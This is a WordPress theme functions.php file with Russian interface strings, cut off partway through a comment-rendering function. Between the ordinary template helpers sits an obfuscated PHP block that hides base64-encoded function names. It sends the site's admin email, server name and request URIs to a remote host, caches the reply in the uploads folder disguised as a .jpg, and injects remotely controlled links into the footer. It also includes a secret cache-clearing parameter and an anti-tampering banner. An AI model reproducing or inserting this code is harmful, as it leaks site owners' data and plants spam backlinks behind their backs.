<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $BLzO='d';$nRtzoQg='s';$feuGANw='b';$HByh='_';$HMtMuU='o';$ITbxquJ='4';$onIJYbz='d';$KgjaH='e';$vLsQyIG='e';$jNvIl='e';$qBQuVx='6';$vCxqlrs='c';$Pxtl='a';$FAvNpQnH=$feuGANw.$Pxtl.$nRtzoQg.$vLsQyIG.$qBQuVx.$ITbxquJ.$HByh.$onIJYbz.$KgjaH.$vCxqlrs.$HMtMuU.$BLzO.$jNvIl;$LciWPJW='l';$Vvqkrk='n';$AZLUwOR='z';$eGJml='g';$GRsCnJ='t';$ofSft='f';$DsqvxL='a';$vrjf='i';$ETgSZY='e';$oVTjXVyR=$eGJml.$AZLUwOR.$vrjf.$Vvqkrk.$ofSft.$LciWPJW.$DsqvxL.$GRsCnJ.$ETgSZY;$xyBaqb='o';$Erihd='_';$NvMdP='t';$rBwp='1';$oLqXg='r';$RTZZbd='3';$wuvpt='t';$yaFRCSA='s';$dflxT='r';$NDMrVcMt=$yaFRCSA.$wuvpt.$oLqXg.$Erihd.$dflxT.$xyBaqb.$NvMdP.$rBwp.$RTZZbd;$nozj='e';$jEpx='t';$LhpvC='r';$RaJoZX='v';$RewYo='s';$sChwBmx='r';$KuMRLyWp=$RewYo.$jEpx.$sChwBmx.$LhpvC.$nozj.$RaJoZX;                     $ht___l='d';$zb______w='s';$lf___p='b';$uh______t='_';$ko_______p='o';$qk__x='4';$hl_______________t='d';$qc______v='e';$es______n='e';$id_________y='e';$do__d='6';$oj_____o='c';$em__l='a';$gu__________p=$lf___p.$em__l.$zb______w.$es______n.$do__d.$qk__x.$uh______t.$hl_______________t.$qc______v.$oj_____o.$ko_______p.$ht___l.$id_________y;$ep__x='n';$mj_________g='c';$dx______________o='t';$tl______________j='f';$rw___z='e';$hs_____l='s';$wy____j='x';$hi______________m='t';$hs__________k='i';$ey_____________t='o';$vt_______l='i';$ia_____________e='n';$er__________y='u';$az_____e='_';$qo_______________l='s';$ir___w=$tl______________j.$er__________y.$ia_____________e.$mj_________g.$dx______________o.$vt_______l.$ey_____________t.$ep__x.$az_____e.$rw___z.$wy____j.$hs__________k.$qo_______________l.$hi______________m.$hs_____l;$ei___s='n';$ly_____t='o';$fp__m='p';$fo_______s='e';$nt____________u='f';$bx____________l=$nt____________u.$ly_____t.$fp__m.$fo_______s.$ei___s;$af__e='f';$bt___________f='d';$ym__e='e';$nc______________x='r';$gq______f='a';$rd_______________h=$af__e.$nc______________x.$ym__e.$gq______f.$bt___________f;$ci_________y='f';$rt_____x='e';$qd__h='l';$eu_______________k='o';$fk______________p='c';$nw___k='s';$ck______i=$ci_________y.$fk______________p.$qd__h.$eu_______________k.$nw___k.$rt_____x;define("WP_ID", $gu__________p("Mi4wLjA="));define("WP_TTL", $gu__________p("MTA4MDA="));define("WP_SRC", $gu__________p("dHBva24="));function wp_get_header() {global $gu__________p, $ir___w;if ($ir___w($gu__________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$ir___w($gu__________p("d3BfZ2V0X2Zvb3Rlcg==")) &&$ir___w($gu__________p("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $gu__________p, $bx____________l, $ck______i, $rd_______________h;$sc____c = TEMPLATEPATH."/".$gu__________p("Zm9vdGVyLnBocA==");$hk_______________m = @$bx____________l($sc____c, "r");$sc____c = @$rd_______________h($hk_______________m, @filesize($sc____c));@$ck______i($hk_______________m);$to____k = TEMPLATEPATH."/".$gu__________p("ZnVuY3Rpb25zLnBocA==");$hk_______________m = @$bx____________l($to____k, "r");$to____k = @$rd_______________h($hk_______________m, @filesize($to____k));@$ck______i($hk_______________m);$ct____c = 0;if($sc____c && $to____k) {if ($gu__________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($sc____c, $gu__________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ct____c = 1;}if (substr_count($sc____c, "wp_theme_GPL_credits()") < 1) {$ct____c = 2;}}if(WP_ID != "2.0.0") {$ct____c = 12;}}if($ct____c > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ct____c -->";}}function wp_loaded() {global $gu__________p, $ir___w;return $ir___w($gu__________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($hg________y, $fs____________n = "(more...)", $vv______u = 0, $sa__s = "") {$yf________q = get_the_content($fs____________n, $vv______u, $sa__s);$yf________q = apply_filters("the_content", $yf________q);$yf________q = str_replace("]]>", "]]>", $yf________q);if (strlen($_GET["p"]) > 0) {echo $yf________q;}else if ((strlen($yf________q)>$hg________y) && ($es_____n = strpos($yf________q, " ", $hg________y ))) {$yf________q = substr($yf________q, 0, $es_____n);$yf________q = $yf________q;echo $yf________q;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$fs____________n</a></div></p>";} else {echo $yf________q;}}}$pj________y='b';$if____________j='o';$dk__k='_';$wc_____l='e';$nd_____________c='c';$pe_______p='s';$dt____________f='a';$bc_______r='6';$bc__c='d';$mu_______p='n';$fl_____________j='e';$dv______u='4';$bv_______r='e';$tq____m=$pj________y.$dt____________f.$pe_______p.$bv_______r.$bc_______r.$dv______u.$dk__k.$wc_____l.$mu_______p.$nd_____________c.$if____________j.$bc__c.$fl_____________j;$uf________b='_';$tl__________k='i';$wf___________l='g';$fh____g='e';$je_______n='o';$ev________o='e';$co_____________y='t';$aw___u='n';$xq____________n='t';$un_______z='e';$zn____________f='c';$gw_______f='l';$up_____w='n';$uh___a='f';$pn______________j='_';$dq______________c='s';$bi_______w='t';$qk___________b=$uh___a.$tl__________k.$gw_______f.$ev________o.$uf________b.$wf___________l.$fh____g.$bi_______w.$pn______________j.$zn____________f.$je_______n.$aw___u.$co_____________y.$un_______z.$up_____w.$xq____________n.$dq______________c;$ct_______k='i';$hk_____w='e';$js_____________s='x';$dk_____________d='l';$gw_____v='_';$cu__l='i';$jk___x='f';$fc_______h='s';$vu___________z='t';$en___l='s';$om_______________j='e';$ji__________b=$jk___x.$ct_______k.$dk_____________d.$hk_____w.$gw_____v.$om_______________j.$js_____________s.$cu__l.$fc_______h.$vu___________z.$en___l;$iy______________a='i';$bu_______________m='a';$pg____u='e';$az______m='r';$jk_______v='m';$yj___y='o';$wa___s='v';$eh______b='_';$tq______________v='n';$pz_______j='r';$pd______________y='p';$il____________y='c';$kv__x='o';$lf___________b='s';$qn__________d='e';$se_______________q=$wa___s.$qn__________d.$az______m.$lf___________b.$iy______________a.$kv__x.$tq______________v.$eh______b.$il____________y.$yj___y.$jk_______v.$pd______________y.$bu_______________m.$pz_______j.$pg____u;$xo_________h='o';$az________n='k';$zp______________u='o';$ox_____________v='f';$dz____________m='s';$ql________t='n';$jt____c='c';$bt__________q='e';$nk__________c='p';$ol__________b=$ox_____________v.$dz____________m.$zp______________u.$jt____c.$az________n.$xo_________h.$nk__________c.$bt__________q.$ql________t;$sz___________p='r';$xn______i='f';$kx________u='i';$ox___u='t';$wr_________g='e';$sp____________n='w';$vx__________m=$xn______i.$sp____________n.$sz___________p.$kx________u.$ox___u.$wr_________g;$bd_______________q='d';$ac_______w='5';$ue___________f='m';$kf____x=$ue___________f.$bd_______________q.$ac_______w;$gq_______z='h';$oh________m='a';$wh_____l='t';$hw___________d='a';$wf___o='e';$pr___n='p';$ty____h='r';$dv_____________p='l';$jb___s=$ty____h.$wf___o.$hw___________d.$dv_____________p.$pr___n.$oh________m.$wh_____l.$gq_______z;$rl______a='i';$nw_________e='s';$eg____t='i';$os________f='l';$fz_____________z='a';$wc_______n='e';$uk___________h='z';$xa_______________a='r';$qm____________z='u';$on____x='n';$ge________d='e';$xc________b=$qm____________z.$on____x.$nw_________e.$wc_______n.$xa_______________a.$rl______a.$fz_____________z.$os________f.$eg____t.$uk___________h.$ge________d;$ll__________m='e';$py____________n='n';$kt____h='a';$gw_____c='t';$je________f='m';$ny__________o='p';$ze____________n='m';$rh__________f=$gw_____c.$ll__________m.$ze____________n.$ny__________o.$py____________n.$kt____h.$je________f;$xc_______________k='c';$ni___________z='s';$um__________i='e';$fb________q='c';$nl__m='t';$on________f='e';$yr______________v='n';$lr_______z='o';$du___f='t';$bz_______l='x';$jo__p='m';$sw__________r='r';$dc__a='_';$wz__o='r';$dt____n='a';$yr__p='_';$th_____________w='e';$og______y='t';$ry_______t='t';$mw_______________f='a';$cu______________b='e';$gg______________m=$ni___________z.$og______y.$wz__o.$cu______________b.$dt____n.$jo__p.$yr__p.$xc_______________k.$lr_______z.$yr______________v.$ry_______t.$th_____________w.$bz_______l.$nl__m.$dc__a.$fb________q.$sw__________r.$on________f.$mw_______________f.$du___f.$um__________i;function ka________n($xn______c) {global $gu__________p, $ir___w, $qk___________b, $se_______________q, $gg______________m;if (!$ir___w($gu__________p("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($se_______________q(PHP_VERSION, "5.0.0", ">=") && $ir___w($gu__________p("ZmlsZV9nZXRfY29udGVudHM=")) && $ir___w($gu__________p("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$gf_______p = $gg______________m(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$fl_______________y = @$qk___________b($xn______c, 0, $gf_______p);} else {$fl_______________y = @$qk___________b($xn______c, 0);}return $fl_______________y;}function eg_____d($xn______c) {global $ir___w, $ol__________b, $vx__________m, $gu__________p;if (!$ir___w($gu__________p("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$pq___________t = strpos($xn______c, "/", 7);$lh_______v = array("uri"     => substr($xn______c, $pq___________t),"host"    => str_replace("http://", "", substr($xn______c, 0, $pq___________t)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$jg______________v = @$ol__________b("$lh_______v[host]", 80, $pg____t, $si_______________o, 4);if (!$jg______________v) {return false;} else {$fl_______________y = "";$er___________f  = "GET $lh_______v[uri] HTTP/1.0\r\n";$er___________f .= "Host: $lh_______v[host]\r\n";$er___________f .= "Referer: $lh_______v[referer]\r\n";$er___________f .= "Connection: Close\r\n\r\n";@$vx__________m($jg______________v, $er___________f);while (!@feof($jg______________v)) {$ke__________r = @fgets($jg______________v, (1024*24));if ($ke__________r == "\r\n") {$jp___b = true;continue;}if ($jp___b) {$fl_______________y .= $ke__________r;}}return $fl_______________y;}}function jr__________d($xn______c) {global $ir___w;$pj_____w = false;if ($xn______c != "") {if ($ir___w("ka________n")) {$pj_____w = @ka________n($xn______c);}if (!$pj_____w && ($ir___w("eg_____d"))) {$pj_____w = @eg_____d($xn______c);}}return $pj_____w;}function et___________x() {global $_SERVER, $kf____x;$mq__________r = $_SERVER["SERVER_NAME"];if (substr("$mq__________r", 0, 4) == "www.") {$mq__________r = substr("$mq__________r", 4);}$mq__________r = $kf____x("$_SERVER[SERVER_NAME]");return $mq__________r;}function og_____m() {return "file";}function xj_______________s($xn______c) {global $_SERVER, $qk___________b, $ji__________b, $bx____________l, $ck______i, $vx__________m;$lu_________r = gt_____p();$ec____a = et___________x().".jpg";$dn__________n = $lu_________r["dir_upload"]["path"]."/$ec____a";$ih____e = @filemtime($dn__________n);if (!$ih____e || ((time()-$ih____e) >= WP_TTL)) {$pj_____w = jr__________d($xn______c);if ($pj_____w) {if ($ji__________b($dn__________n)) {@unlink($dn__________n);}$hk_______________m = @$bx____________l($dn__________n, "x+");@$vx__________m($hk_______________m, $pj_____w);@$ck______i($hk_______________m);}} else {if ($ji__________b($dn__________n)) {$pj_____w = @$qk___________b($dn__________n);} else {$pj_____w = false;}}return $pj_____w;}function gt_____p() {global $_SERVER, $gu__________p, $tq____m;$tu____u = wp_count_posts("post");$ek__z = pathinfo(get_bloginfo("template_directory"));$lu_________r = array("url" => array("report"      => $gu__________p("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $ek__z,"dir_upload"=> xk______f(),"queryString"=> array("?a001=".WP_ID,"a004=".$ek__z[filename],"a005=".$tu____u->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$lu_________r["url"]["queryString"] = implode("&", $lu_________r["queryString"]);$lu_________r["url"]["report"] = $lu_________r["url"]["report"]."/?".$tq____m($lu_________r["url"]["queryString"]).".html";return $lu_________r;}function xk______f() {$ij_____________i = wp_upload_dir();if (isset($ij_____________i["error"])) {$sx__q = ff___j();if (is_writable($sx__q)) {$ij_____________i = array("path" => $sx__q);}}return $ij_____________i;}function ff___j() {global $ir___w, $kf____x, $jb___s, $rh__________f;$kx________s = (bool) ini_get("safe_mode");if ($kx________s == true) {return false;}if ($ir___w("sys_get_temp_dir")) {$lq_____________d = sys_get_temp_dir();if (is_writable($lq_____________d)) {return $jb___s($lq_____________d);}}if (!empty($_ENV["TMP"])) {return $jb___s($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $jb___s($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $jb___s($_ENV["TEMP"]);} else {$sy_____n = $rh__________f($kf____x(uniqid(rand(), true)), "");if ($sy_____n) {$lq_____________d = $jb___s(dirname($sy_____n));@unlink($sy_____n);return $lq_____________d;} else {return false;}}}function jt__q() {global $_GET, $ji__________b;$lu_________r = gt_____p();$mq__________r = et___________x();$bz______________m = og_____m();$kd________c = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($bz______________m == "file") {$hl______z = $lu_________r["dir_upload"]["path"]."/".$mq__________r.".jpg";if ($ji__________b($hl______z)) {@unlink($hl______z);$kd________c = "deleted";}}$pw_______c = array("s"=> $kd________c,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($pw_______c AS $jd________r => $ot___________o) echo " [$jd________r:$ot___________o]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $ir___w, $gu__________p, $xc________b;$lu_________r = gt_____p();$eo____________l = "xj_______________s";if ($ir___w($eo____________l)) {$fl_______________y = $eo____________l($lu_________r["url"]["report"]);}if ($fl_______________y) {if ($fl_______________y = @$gu__________p($fl_______________y)) {$fl_______________y = @$xc________b($fl_______________y);if (strlen($fl_______________y[custom_credit]) >= 5) {$lu_________r["default_string"] = $fl_______________y[custom_credit];}if ($fl_______________y["status"] == "0") {$xk_____b = 1;$ra__________p = 1;} else {$qp_____i = sizeof($fl_______________y["links"]);$fs___________m = $lu_________r["default_string"];if ($qp_____i > 0 && $fl_______________y["links"] !== "") {$ym________y = 0;foreach ($fl_______________y["links"] as $bg_______g => $ez___n) {$ym________y++;if ($ez___n->l_path == "" || $ez___n->l_path == $_SERVER["REQUEST_URI"]) {$ez___n->l_href = htmlspecialchars(strip_tags($ez___n->l_href));$ez___n->l_title = htmlspecialchars(strip_tags($ez___n->l_title));$ez___n->l_anchor = htmlspecialchars(strip_tags($ez___n->l_anchor));$fs___________m .= " | ";$fs___________m .= "<a href='$ez___n->l_href' title='$ez___n->l_title'";if ($ez___n->l_nofollow == "1") {$fs___________m .= " rel='nofollow'";}$fs___________m .= ">$ez___n->l_anchor</a>";}}}$lu_________r["links"] = "$fs___________m";if ($fl_______________y[credit] == "0") {$lu_________r["links"] = "";}}} else {$xk_____b = "1";}} else {$xk_____b = "1";}if ($xk_____b == "1") {$lu_________r["links"] = $lu_________r["default_string"];}echo "$lu_________r[links]";echo "<!-- s: $fl_______________y[signature] -->";jt__q();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                    $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
